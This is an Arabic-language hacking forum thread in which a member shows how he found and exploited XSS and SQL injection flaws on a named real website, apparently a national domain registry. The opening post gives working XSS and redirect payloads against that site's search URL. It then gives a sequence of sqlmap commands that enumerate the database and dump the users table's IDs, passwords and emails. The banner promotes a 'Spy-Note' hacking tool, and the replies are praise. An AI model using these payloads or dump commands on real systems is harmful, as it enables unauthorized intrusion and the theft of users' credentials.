1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
  1. خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    100
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اليوم اعود لكم بشرح اكتشاف ثغرات الموزع وكيف يتم استغلالها بشكل مفصل لكي تتم

    الفايده من الموضوع بصراحه صاحب الفكره المبدع برستيج جزاه الله خير الجزاء

    حبيت اوضح الفكره في الشبكه لتعم الفائده بشكل اكثر

    معنا هذا الموزع تحت المجهر

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    قلت خلني اتفحصه واشوف شنو فيه والحمدالله اكتشفت فيه ثغرتين

    sql & xss

    طيب نضع لمسات مصوره *:"

    [​IMG]

    نشوف الأن كيف تم اكتشاف الثغره xss

    نشوف محرك البحث

    ونجرب هذا الكود

    كود PHP:
    <<SCRIPT>alert("hacked by IQ-TeaM ");//<</SCRIPT>
    [​IMG]

    النتيجه ُ;)ًٌُ

    [​IMG]

    طلع فيه اصابه الحين نشوف نزرع كود التحويل

    نجرب الكود

    كود PHP:
    '<script>location.replace("http://www.iq-team.org");</script>'
    [​IMG]

    نشوف المسار والتحويل

    كود PHP:
    http://www.nic.mw/index.php?d=0&domain=%27%3Cscript%3Elocation.replace%28%22http%3A%2F%2Fwww.iq-team.org%22%29%3B%3C%2Fscript%3E%27&Submit=Search
    النتيجه

    [​IMG]

    تمام تم التحويل

    نتقل الان الى الثغره الثانيه الي هي sql

    نشوف كيف تم اكنتشافها

    كود PHP:
    http://www.nic.mw/index.php?d=0&domain=1'%20AND%201=3%20'
    [​IMG]

    احتمال اصابته بنوع بلند سكويل قلنا خلنا نشوف sqlmap

    نشوف الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" --dbs
    وكانت النتيجه زي ما توقعت انه مصاب

    نشوف الناتج

    [​IMG]

    نكمل الحين باقي الاوامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus --tables
    [​IMG]

    اوكي تمام نشوف الحين جدول users

    نستخدم هذا الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus -T users --columns
    النتيجة

    [​IMG]

    نستخرج الحين البينات النهائيه

    نستخدم الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus -T users -C user_id,password,email --dump
    ونشوف النتيجه

    [​IMG]

    تم استخراج البينات من القاعده

    والسلام خير الختام والسلام علكيم ورحمة الله وبركاته
     
    1 person likes this.
    جاري تحميل الصفحة...
  2. Tej HAcKEr
    DeveloPer Plus

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    116
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    الوظيفة:
    hacker
    الإقامة:
    Tunisia
    نظام التشغيل:
    Unix
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    صراحا انتا مبدع وموضوعك رائع جدأأ شكرأأ لمجهودك راقي والمميز
     
  3. Yousef <link href="http://www.iq-team.org/vb/ghost/ghost.
    DeveloPer Plus

    عضو منذ:
    ‏1 نوفمبر 2012
    عدد المشاركات:
    112
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    وعليكم السلام

    يعطيك الف عافية يا غالى

    بتوفيق يا غالى ً#ٌ5oًًًُ.
     
  4. خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    100
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    تسلموا شباب على المرور الرائع
     
  5. KaBriMO
    rank
    Developer

    عضو منذ:
    ‏14 يوليو 2012
    عدد المشاركات:
    38
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    المغرب
    نظام التشغيل:
    Linux
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    [font="ae_almothnna"]مشكوور على الشرح ..![/font]
     
  6. Hell_Hac
    rank
    Developer

    عضو منذ:
    ‏16 يونيو 2013
    عدد المشاركات:
    30
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    15
    الإقامة:
    آلمـدينـة آلمنـورة
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    جميل جدا مشاء الله عليك اخي الكريم

    بارك الله فيك
     
  7. صــــاروخ
    rank
    Developer

    عضو منذ:
    ‏3 ديسمبر 2012
    عدد المشاركات:
    32
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    شرح أكثر من رائع و موضوع منسق بشكل أروع

    مشكور حبيبي الغالي

    يوشم بالخماسي + التقييم لشخصك الكريم

    تحياتي حبيبي
     
  8. •● ṔriNḉẻ ●•
    DeveloPer Plus

    عضو منذ:
    ‏5 يناير 2013
    عدد المشاركات:
    99
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    50
    الإقامة:
    Hollywood
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Java
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    وعليكم السلام ورحمة الله و بركاته

    بارك الله فيك أخي شرح رائع

    واصل ابداعك ولا تحرمنا من جديدك يالغالي​
     
  9. Al-JoKeR
    ExpErt DeveloPer

    عضو منذ:
    ‏22 ديسمبر 2011
    عدد المشاركات:
    127
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    الوظيفة:
    طالب علم
    الإقامة:
    الجنة ان شاء الله
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    جزاك الله كل خير أخي
    إبداع وتألق دائمين​
     
  10. TIGERs HAKER
    Active DeveloPer

    عضو منذ:
    ‏2 نوفمبر 2012
    عدد المشاركات:
    80
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    Unix
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    بسمَ آللهِ مـآ شآءِ آللهُِ ،،
    شرٍح مبسطُ وبطرٍيقهِ روٍوٍعهِ ..
    آللهِ يعطُيكَ آلعآفيهُِ .. {ً#ٌ5oًًًُ. }
     

مشاركة هذه الصفحة

جاري تحميل الصفحة...